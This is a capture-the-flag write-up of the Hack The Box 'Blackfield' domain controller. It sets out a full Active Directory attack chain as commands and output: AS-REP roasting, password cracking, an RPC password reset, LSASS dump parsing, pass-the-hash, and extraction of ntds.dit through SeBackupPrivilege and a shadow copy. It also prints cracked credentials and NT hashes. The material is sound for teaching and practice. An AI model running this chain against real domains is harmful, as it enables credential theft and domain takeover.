
Author: Ikonw

Nmap Scan:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 20:09 +08
Nmap scan report for 10.10.10.192
Host is up (0.0074s latency).

PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-07 19:09:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp filtered netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-07T19:09:47
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.59 seconds


Run smbmap against the host with an anonymous (null) session: two shares, IPC$ and profiles$, are readable without credentials. Also note the nearly 7-hour clock skew in the nmap output: Kerberos tolerates 5 minutes by default, so any ticket-based step later on would need the attacking box's clock aligned with the DC.

┌──(root💀kali)-[/opt/nmapAutomator]
└─# smbmap -H 10.10.10.192 -u anonymous
[+] Guest session IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share

Contents of profiles$

profiles$ contains one directory per domain user, so the listing is a ready-made username list. Take the first column with awk (-N asks for a null session instead of prompting for a password). The junk entries this also captures (., .. and the "blocks of size" summary) are harmless: they come back from the KDC as "not found" or "invalid principal syntax".

smbclient -N \\\\10.10.10.192\\profiles$ -c ls | awk '{print $1}' > user.lst
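The awk one-liner works, but it keeps everything in the first column, including ., .. and the blocks-of-size summary. As an added example (not part of the original writeup), here is a small Python parser for smbclient's ls output that keeps only directory entries, since in profiles$ every user is a directory. The sample listing is constructed in the same layout as the real share, not a capture:

```python
import re

# One line of `smbclient ... -c ls` output: name, attribute letters, size, timestamp.
# Names may contain spaces, so the regex anchors on the attribute/size/date tail.
_LS_LINE = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[DAHSRN]+)\s+(?P<size>\d+)\s+"
    r"(?P<date>\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\s*$"
)


def parse_smbclient_ls(output: str):
    """Yield (name, attrs, size) for every real entry; '.', '..', blank lines
    and the trailing 'blocks of size' summary are skipped."""
    for line in output.splitlines():
        m = _LS_LINE.match(line)
        if not m or m["name"] in (".", ".."):
            continue
        yield m["name"], m["attrs"], int(m["size"])


def usernames_from_profiles(output: str):
    """profiles$ holds one directory per user: keep directories only, so a stray
    file in the share does not end up in the list handed to GetNPUsers.py."""
    return sorted({name for name, attrs, _ in parse_smbclient_ls(output) if "D" in attrs})


# Constructed sample (not a capture) in the layout smbclient prints for this share.
SAMPLE_LS = """\
  .                                   D        0  Thu Jun  4 00:47:12 2020
  ..                                  D        0  Thu Jun  4 00:47:12 2020
  audit2020                           D        0  Thu Jun  4 00:47:11 2020
  BLACKFIELD764430                    D        0  Thu Jun  4 00:47:11 2020
  support                             D        0  Thu Jun  4 00:47:11 2020
  svc_backup                          D        0  Thu Jun  4 00:47:11 2020
  readme.txt                          A      120  Thu Jun  4 00:47:11 2020

                7846143 blocks of size 4096. 3978511 blocks available
"""

if __name__ == "__main__":
    # Drop-in replacement for the awk step: one username per line.
    print("\n".join(usernames_from_profiles(SAMPLE_LS)))
```

Pipe the real listing in (smbclient -N \\\\10.10.10.192\\profiles$ -c ls | python3 parse_ls.py with sys.stdin.read() in place of SAMPLE_LS) and the resulting file needs no further cleaning.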

Feed the list to Impacket's GetNPUsers.py, which sends an AS-REQ without pre-authentication for every name (AS-REP roasting). Accounts that exist but require pre-auth are reported as such, names the KDC does not know are filtered out with grep:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.local/ -no-pass -usersfile user.lst | grep -v "not found"
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:d3f58a3eb5d36dc74f2c4a4335a5ce3e$06ce4ccf78e620d6e2e9994bd546f519cabec98dd1879365456bcee2081d7f0579d8e6b20d7b0e5750c533de72b48404ad38bf2241acc01cdf9e1868717cb01142ab131ebda7de2a0916a141ba5b1fd1b8e0895833ea57ce4b01cd93900eba7c4bab1e1a8dfcdb471486fedc1f731b5e65f38219e37883274350288d916e18f43359a170dd9aa3ef22d53c399378ed3467467211d6be448ee73983abe6cf7998725bfa70b7de45969715c15417af5249ebe9dd16332222f17101bbb1bdbfc2d32ac2bc319302911973a88a2b67fd425092e0f31329d04fd9eca106a97f2265185f6ae6c8ca8e747272dcad410bfbedac0275ed12
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

Save the $krb5asrep$ line to a file (user_hash) and crack it with john. It falls out of rockyou in seconds, giving support:#00^BlackKnight

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:16 DONE (2020-09-07 21:30) 0.06203g/s 889266p/s 889266c/s 889266C/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Trying these credentials against WinRM (5985) fails: support cannot log in that way.

So back to SMB with the new credentials:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# smbmap -H 10.10.10.192 -u support -p "#00^BlackKnight"
[+] IP: 10.10.10.192:445 Name: BLACKFIELD.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

NETLOGON and SYSVOL are readable now, but hold nothing interesting.

Next, enumerate the domain over MS-RPC with rpcclient:

rpcclient -U blackfield.local\\support 10.10.10.192
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
...........................

Another long list of users, the same names as the profiles$ directories. Nothing else in the RPC enumeration stood out, but one article shows how to reset another domain user's password over RPC, which is worth trying with support's credentials:

Reset AD User password with Linux

Reset audit2020's password to Ikonw123! with setuserinfo2. This only succeeds because support holds a password-reset right over audit2020 (otherwise the DC answers NT_STATUS_ACCESS_DENIED), and it is a destructive change: the real owner of the account is locked out until someone resets it again, so on a live engagement it needs explicit client approval.

rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 Ikonw123!

WinRM still refuses the login, but with audit2020's new password the share listing changes again: the forensic share is now readable.

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbmap -H 10.10.10.192 -u audit2020 -p Ikonw123!
[+] IP: 10.10.10.192:445 Name: BLACKFIELD.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbclient \\\\10.10.10.192\\forensic -U audit2020
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 21:03:16 2020
.. D 0 Sun Feb 23 21:03:16 2020
commands_output D 0 Mon Feb 24 02:14:37 2020
memory_analysis D 0 Fri May 29 04:28:33 2020
tools D 0 Sun Feb 23 21:39:08 2020

7846143 blocks of size 4096. 3978511 blocks available
smb: \>

That is a lot of files. Pull the whole share down (if your link is slow, mounting the share with mount -t cifs and picking files selectively is the alternative):

recurse ON
prompt OFF
mget *

memory_analysis contains lsass.DMP. A .DMP file holds data dumped from a process's memory space; Windows writes one when a program crashes (Savedump.exe saves the kernel equivalent, Memory.dmp, on the first reboot after a crash). A minidump of LSASS is exactly what credential-dumping tools read: pypykatz parses the secrets cached in it offline, the equivalent of mimikatz's sekurlsa:: module:

pypykatz lsa minidump lsass.DMP

It yields the NT hash of the svc_backup account:

== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c

No cracking needed: evil-winrm accepts the NT hash directly (pass-the-hash over NTLM with -H):

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap/memory_analysis]
└─# evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Privilege escalation

whoami /priv shows that svc_backup holds SeBackupPrivilege, and that it is enabled.

SeBackupPrivilege
Description: This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file.

First attempt: vssadmin, which refuses to run without an elevated shell:

*Evil-WinRM* PS C:\Users> vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Error: You don't have the correct permissions to run this command. Please run this utility from a command
window that has elevated administrator privileges.

Members of "Backup Operators" can log on locally to a Domain Controller and back up the NTDS.DIT, for example with "wbadmin.exe" or "diskshadow.exe".

diskshadow can create a shadow copy of C: and expose it under another drive letter, which is what the following script does:

shadow_copy.txt

set context persistent nowriters
add volume c: alias ikonw
create
expose %ikonw% z:

However, diskshadow rejects the script: it reads the first command as "set context persistent nowriter", i.e. the last character of every line has been dropped. This is a known quirk of diskshadow /s with script files written from Linux (the usual explanation is the line endings), and the error helpfully prints the accepted syntax:

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

CLIENTACCESSIBLE Specify to create shadow copies usable by client versions of Windows.
PERSISTENT Specify that shadow copy is persist across program exit, reset or reboot.
PERSISTENT NOWRITERS Specify that shadow copy is persistent and all writers are excluded.
VOLATILE Specify that shadow copy will be deleted on exit or reset.
VOLATILE NOWRITERS Specify that shadow copy is volatile and all writers are excluded.

Example: SET CONTEXT CLIENTACCESSIBLE

The usual workaround is to append one extra character to every line, which diskshadow then discards:

set context persistent nowriterss
add volume c: alias ikonww
createe
expose %ikonw% z::

That clears the syntax errors but raises another one:

The .cab metadata file cannot be stored in the current working directory, because it is read-only.

diskshadow writes a .cab metadata file into the current working directory, and the directory we were running from was not writable. Create C:\temp, put shadow_copy.txt there and run from that directory. This time the shadow copy is created and exposed as Z:

*Evil-WinRM* PS C:\temp> diskshadow /s shadow_copy.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/8/2020 5:40:45 AM

-> set context persistent nowriters
-> add volume c: alias ikonw
-> create
Alias ikonw for shadow ID {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81} set as environment variable.

Querying all shadow copies with the shadow copy set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81}

* Shadow copy ID = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922} %ikonw%
- Shadow copy set: {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/8/2020 5:40:45 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %ikonw% z:
-> %ikonw% = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922}
The shadow copy was successfully exposed as z:\.
->


The shadow copy exposed as Z: carries the same ACLs as C:, so a plain copy of Z:\Windows\NTDS\ntds.dit is still denied: SeBackupPrivilege is only honoured when the file is opened with backup semantics. The README of the SeBackupPrivilege project on GitHub (giuliano108/SeBackupPrivilege) spells this out:

  • If you want to read/copy data out of a "normally forbidden" folder, you have to act as a backup software. The shell copy command won't work; you'll need to open the source file manually using CreateFile making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

The project ships two DLLs that do exactly that, SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll. Upload both to C:\temp, import them, and copy ntds.dit out of the shadow copy with the Copy-FileSeBackupPrivilege cmdlet:

*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> cd z:\windows\ntds
*Evil-WinRM* PS z:\windows\ntds> Copy-FileSeBackupPrivilege ntds.dit c:\temp\ntds.dit
*Evil-WinRM* PS z:\windows\ntds> cd c:\temp
*Evil-WinRM* PS C:\temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/8/2020 5:40 AM 617 2020-09-08_5-40-45_DC01.cab
-a---- 9/8/2020 5:52 AM 18874368 ntds.dit
-a---- 9/8/2020 5:50 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 9/8/2020 5:51 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 9/8/2020 5:40 AM 88 shadow_copy.txt

That gives us ntds.dit in C:\temp; download it to Kali with evil-winrm's download command.

secretsdump.py cannot decrypt it on its own: the hashes in ntds.dit are protected by the Password Encryption Key (PEK), which is itself encrypted with the boot key stored in the SYSTEM hive, so export that hive as well (SeBackupPrivilege is enough for reg save):

reg save HKLM\SYSTEM c:\temp\system.hive
┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.hive LOCAL -outputfile hash | more
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

Administrator's NT hash is in the dump, so pass it to evil-winrm the same way (-u Administrator -H 184fb5e5178480be64824d4cd53b99ee) and we have a shell as Administrator on DC01.



